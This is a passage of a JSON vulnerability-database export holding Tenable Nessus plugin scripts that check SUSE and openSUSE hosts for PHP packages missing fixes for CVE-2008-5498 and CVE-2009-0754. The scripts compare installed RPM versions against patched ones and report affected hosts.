);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0754.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6069.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"apache2-mod_php5-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-bcmath-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-bz2-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-calendar-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-ctype-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-curl-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-dba-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-dbase-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-devel-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-dom-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-exif-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-fastcgi-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-ftp-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-gd-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-gettext-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-gmp-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-iconv-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-imap-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-json-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-ldap-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-mbstring-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-mcrypt-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-mhash-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-mysql-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-ncurses-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-odbc-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-openssl-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pcntl-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pdo-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pear-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pgsql-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-posix-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pspell-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-shmop-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-snmp-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-soap-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sockets-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sqlite-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-suhosin-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sysvmsg-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sysvsem-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sysvshm-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-tokenizer-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-wddx-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-xmlreader-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-xmlrpc-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-xsl-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-zlib-5.2.5-9.14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:12:04", "bulletinFamily": "scanner", "description": "php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate function of the gd extension potentially allowed attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to other virtual hosts on th same machine (CVE-2009-0754).", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_0_APACHE2-MOD_PHP5-090312.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39916", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : apache2-mod_php5 (apache2-mod_php5-593)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-593.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39916);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:49 $\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_php5 (apache2-mod_php5-593)\");\n script_summary(english:\"Check for the apache2-mod_php5-593 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=471419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=480948\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"apache2-mod_php5-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-bcmath-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-bz2-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-calendar-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-ctype-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-curl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-dba-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-dbase-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-devel-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-dom-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-exif-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-fastcgi-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-ftp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-gd-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-gettext-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-gmp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-hash-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-iconv-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-imap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-json-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-ldap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-mbstring-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-mcrypt-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-mysql-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-ncurses-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-odbc-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-openssl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pcntl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pdo-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pear-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pgsql-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-posix-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pspell-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-readline-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-shmop-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-snmp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-soap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sockets-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sqlite-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-suhosin-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sysvmsg-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sysvsem-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sysvshm-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-tidy-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-tokenizer-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-wddx-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-xmlreader-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-xmlrpc-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-xmlwriter-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-xsl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-zip-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-zlib-5.2.9-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:12:09", "bulletinFamily": "scanner", "description": "php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate function of the gd extension potentially allowed attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to other virtual hosts on th same machine (CVE-2009-0754).", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_1_APACHE2-MOD_PHP5-090312.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40187", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : apache2-mod_php5 (apache2-mod_php5-593)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-593.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40187);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:51 $\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_php5 (apache2-mod_php5-593)\");\n script_summary(english:\"Check for the apache2-mod_php5-593 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=471419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=480948\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n 